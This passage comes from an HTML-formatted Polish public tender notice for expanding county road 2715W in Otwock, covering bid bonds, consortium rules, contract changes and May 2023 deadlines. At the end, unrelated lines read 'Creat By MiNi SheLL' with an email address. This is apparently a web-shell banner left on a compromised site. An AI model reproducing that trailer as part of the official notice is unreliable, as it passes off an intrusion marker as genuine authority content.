<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami; wzór <br/>wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia <br/>publicznego stanowi Załącznik do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków dowodowych<br/>wraz z ofertą.<br/>W przypadku gdyż wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone przedmiotowe<br/>środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków dowodowych<br/>wraz z ofertą.<br/>W przypadku gdyż wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone przedmiotowe<br/>środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 50 000,00 zł <br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje <br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków <br/>o których mowa w art. 98 ust. 1 pkt. 2 i 3 oraz ust. 2 pzp. <br/>3. Przedłużenie związania ofertą jest dopuszczalne tylko z jednoczesnym <br/>przedłużeniem okresu ważności wadium albo jeżeli nie jest to możliwe z <br/>wniesieniem nowego wadium na przedłużony okres związania ofertą. <br/>4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku <br/>następujących formach <br/>a) Pieniądzu <br/>b) Gwarancji bankowej, <br/>c) Gwarancjach ubezpieczeniowych, <br/>d) Poręczeniach udzielonych przez podmiot, o którym mowa w art. 6b ust. 5 pkt 2 <br/>ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości <br/>e) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy. <br/>5. Wadium wnoszone w pieniądzu zamawiający przechowuje na rachunku bankowym. <br/>a) Wadium wnoszone w pieniądzu należy wnieść na konto o numerze 97 8023 <br/>0009 2001 0009 8805 0014 Powiat Otwocki – Zarząd Dróg Powiatowych w <br/>Otwocku z/s w Karczewie ul. Bohaterów Westerplatte 36, 05- 480 Karczew <br/>tytułem wadium <br/>„Rozbudowa drogi powiatowej 2715W w Otwocku” – ZDP/P-26/2022 Wadium <br/>musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed <br/>upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy <br/>zamawiającego). <br/>b) wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty <br/>w oryginale w postaci dokumentu elektronicznego podpisanego <br/>kwalifikowanym <br/>podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać <br/>następujące elementy: <br/>− nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji <br/>(zamawiającego), <br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem <br/>wskazanym w gwarancji lub poręczeniu musi być: Powiat Otwocki – Zarząd <br/>Dróg Powiatowych w Otwocku z/s w Karczewie ul. Bohaterów Westerplatte <br/>36, 05-480 Karczew <br/>− określenie wierzytelności, która ma być zabezpieczona <br/>gwarancją/poręczeniem, <br/>− kwotę gwarancji/poręczenia, <br/>− termin ważności gwarancji/poręczenia, <br/>− zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia <br/>bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach <br/>określonych w art. 98 ust. 6 ustawy Pzp <br/> Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-<br/>5 pzp <br/>d) Zmawiający zatrzyma wadium w sytuacji wystąpienia ustawowych podstaw do <br/>jego zatrzymania, określonych w art. 98 ust. 6 pzp. <br/>e) Jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób <br/>nieprawidłowy, zgodnie z zapisami art. 266 ust. 1 pkt 14) ustawy pzp <br/>Zamawiający odrzuci taką ofertę. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 28) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>29) W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Umocowanie należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem (liderem).<br/>30) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołącza do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonują poszczególni wykonawcy.<br/>31) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <br/>32) Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą na trzy dni<br/>przed zwarciem umowy w sprawie zamówienia publicznego są zobowiązaniu przedstawić zamawiającemu stosowną umowę<br/>regulującą współprace tych Wykonawców występujących wspólnie, zawierającą w swej treści następujące postanawiania:<br/> Określenie celu gospodarczego<br/> Oznaczenie czasu trwania konsorcjum, obejmującego okres realizacji przedmiotu zamówienia,<br/> Podział zadań pomiędzy poszczególnych Wykonawców występujących wspólnie, zgodnie z oświadczeniem,<br/> Wykluczenie możliwości wypowiedzenia umowy wspólnej przez któregokolwiek z Wykonawców występujących do czasu<br/>wykonania zamówienia w całości,<br/> Solidarną odpowiedzialność Wykonawców występujących wspólnie za realizację przedmiotu zamówienia,<br/> Solidarność Wykonawców jako wierzycieli względem wierzytelności, które będą im przysługiwały w związku z realizacją<br/>przedmiotu zamówienia w ramach zawartej z Zamawiającym Umowy<br/> Określenie sposobu płatności wynagrodzenia przez Zamawiającego przysługującego Wykonawcom w związku z realizacją<br/>zamówienia, zgodnie z którym faktury na rzecz Zamawiającego będzie wystawiał Lider, który będzie się rozliczał<br/>wewnętrznie z drugim członkiem konsorcjum <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) z powodu zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy mających wpływ na zakres lub termin<br/>wykonania niniejszej umowy w zakresie niezbędnym do dostosowania się do nowych przepisów,<br/>2) wystąpienia niebezpieczeństwa kolizji z innymi równolegle prowadzonymi robotami przez Zamawiającego lub inne<br/>podmioty w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>3) w przypadku zmiany stawki podatku VAT wprowadzonej przez władzę ustawodawczą w trakcie trwania niemniejszej<br/>umowy,<br/>4) w przypadku nałożenia ograniczeń związanych z działaniem koronawirusa (wirusa SARS-CoV – 2) przejawiającym się<br/>jako epidemia, pandemia lub kwarantanna, ale w sytuacji gdy ich zakres będzie większy niż zakres zaobserwowany w dniu<br/>otwarcia ofert i jeżeli będą miały faktyczny wpływ na realizację niniejszej umowy,<br/>5) w zakresie zmiany terminów wynikających z umowy,<br/>6) w zakresie zmiany materiałów, urządzeń, rozwiązań technicznych itp. W stosunku do przewidzianych w SWZ wraz<br/>załącznikami pod warunkiem, że zamiany te nie pogorszą właściwości funkcjonalno-użytkowych obiektu, o którym mowa w §<br/>1 i będą korzystne dla Zamawiającego.<br/>7) w zakresie zmniejszenia zakresu przedmiotu zamówienia określonego w SWZ wraz załącznikami pod warunkiem, że<br/>wykonanie całości przedmiotu zamówienia napotka istotne trudności, w szczególności spowodowane brakiem uzyskania<br/>planowanego dofinansowania ze środków zewnętrznych.<br/>8) w zakresie zmian personalnych wśród osób wyznaczonych do realizacji zamówienia pod warunkiem, iż<br/>nowowprowadzone osoby spełniają wymagania określone w postępowaniu o udzielenie zamówienia publicznego<br/>9) w zakresie zmiany wynagrodzenia należnego Wykonawcy<br/>Szczegółowy zakres zmian został określony w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-04 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpotwock.eb2b.com.pl/edit-auction.html/391974</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-04 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-02</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Roboty budowlane - 10 miesięcy od daty podpisania umowy na <br/>wykonanie robót budowlanych <br/> <br/>Uzyskanie decyzji zezwalającej na użytkowanie - 11 miesięcy od daty podpisania umowy na uzyskanie decyzji zezwalającej na użytkowanie <br/>obiektu budowlanego

Creat By MiNi SheLL
Email: jattceo@gmail.com